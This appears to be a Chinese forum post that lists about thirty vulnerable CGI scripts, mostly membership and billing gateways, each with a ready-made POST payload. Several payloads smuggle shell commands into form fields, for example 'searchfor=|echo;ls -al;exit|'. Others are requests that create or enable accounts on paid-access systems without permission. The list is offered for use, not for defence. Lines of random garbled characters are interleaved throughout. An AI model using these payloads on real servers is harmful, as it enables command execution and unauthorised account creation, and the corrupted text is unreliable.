Cgi-bin 30个漏洞＋使用方法

admin

==============================

$ C) _9 \# m' X* O) u/smspass.pl
% \$ Y* m/ H* w2 r! kusername=username&password=password

/index.cgi
wei=ren&gen=command

/passmaster.cgi
5 m9 N1 U# L- D8 S; ^6 TAction=Add&Username=Username&Password=Password
' v9 Y, d2 @% |0 [+ a3 P; C
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|

/form.cgi
, E$ }) B% S9 f( d9 T$ w& sname=xxxx&email=email&subject=xxxx&response=|echo;ls|
, U* i& A. l6 o1 v$ d% t
# j/ ?! j. a. z6 t" g/addusr.pl
" v, F& ?3 e9 r- `. f  V& v/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

, o" E3 G- @& _) y9 U/ccbill-local.asp
post_values=username:password

/count.cgi
pinfile=|echo;ls -la;exit|

/recon.cgi
# K' Q- N! R) e* b/recon.cgi?search
. Z  B$ n$ Z) F- Q  O" p* _9 ?/ Ksearchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
! [$ I, Q$ Y- N) P. H7 T( x" v/ evercode=username:password:dseegsow:add:amount<&30>
, t2 g& k" S% l9 \) m( ]& _- r# e
. ~$ \" C+ s! p5 ~, ]/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
9 L. S- i7 O! q' _8 Husername=username&password=password&expire=30

; k6 q. V3 q( v" I* b* T/openjournal.cgi
8 }) C, P% M, Aedit=1&ct=2&go=|echo;ls -al;exit|
4 M& `5 X: k2 a) X# M+ ?
/gx9passwd.cgi
5 H* d" l* ?  S. \6 g: T5 _cmd=ADD&user=username&pass=password
$ [7 L: M- a& a3 J0 d
/probecontrol.cgi
5 Y" D' F, P; s1 k" Z" E, _2 \command=enable&username=username&password=password
% v5 N4 d+ D3 D& x3 ]0 ^0 B  q: |
! l2 G+ N* f9 e# _; P/recon.cgi
" q1 g" ~( ~0 t" A! b0 Ssearchoption=3&searchfor=echo;ls -la;exit

/htadd.pl
& C' L2 W+ B- Qconfigfile=|echo; ls -alt; exit

; u  X9 i; {; w/ O/gx9passwd.cgi
1 p" n% ~* }, Qcmd=ADD&user=username&pass=password

/ibill*.pl
& t( l# i$ N& l' s# qreqtype=add&authpwd=authpwd&username=username&password=password

) B7 \6 D. |6 r1 U7 \$ W/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)
; T3 J( J& N. l% P
7 m5 i" ^& q8 W) V/globill_ut.cgi
+ y) d  I8 l2 o* zdo=add&username=username&password=password&wpassword=password
! F% j2 ^+ c$ [- e6 |8 T
$ h7 }  W3 I  [9 L% t/usercontrol.cgi
command=enable&username=USER&password=PASS
+ l( i# m9 z# Q- x  }5 G3 J4 x
  }9 U' H, q- D/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

/addusr.pl
  K6 O7 A7 `# j9 d) e' cuser=USER&pass=PASS&confirm=PASS
; Z- O  l% I7 u3 `5 o8 B1 q5 W
; r/ ^4 N1 ^2 Z) C& V/pincount.cgi
' T( m) q' u- r- r5 B7 Y7 z- Q( U/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
9 `0 [, w1 f3 ?4 E' g$ G
/accountcreate.cgi
* J9 ^0 J* _0 _% @) S  B# B! C/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
5 J' u' }8 p: b# l/ X+ t/env.cgi
" N) O# i3 b- M& _/ B7 e" C6 TADD+;echo;pwd;exit
0 `- B- _) x- Q2 |4 F+ Q+ C
/count.cgi
4 f9 x1 O( O; [# ?# @/ Kpinfile=|echo;pwd;exit|
1 O; E. n$ ~: B# L* V
/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
+ A, ^2 i; _: v: u1 I* A
/add.cgi
; s# Z6 E5 ^2 U9 X5 K5 y9 M( ousername=username&password=password&expire=30

==============================
2 [; Q8 L* ~6 M: _+ y5 ~9 k6 \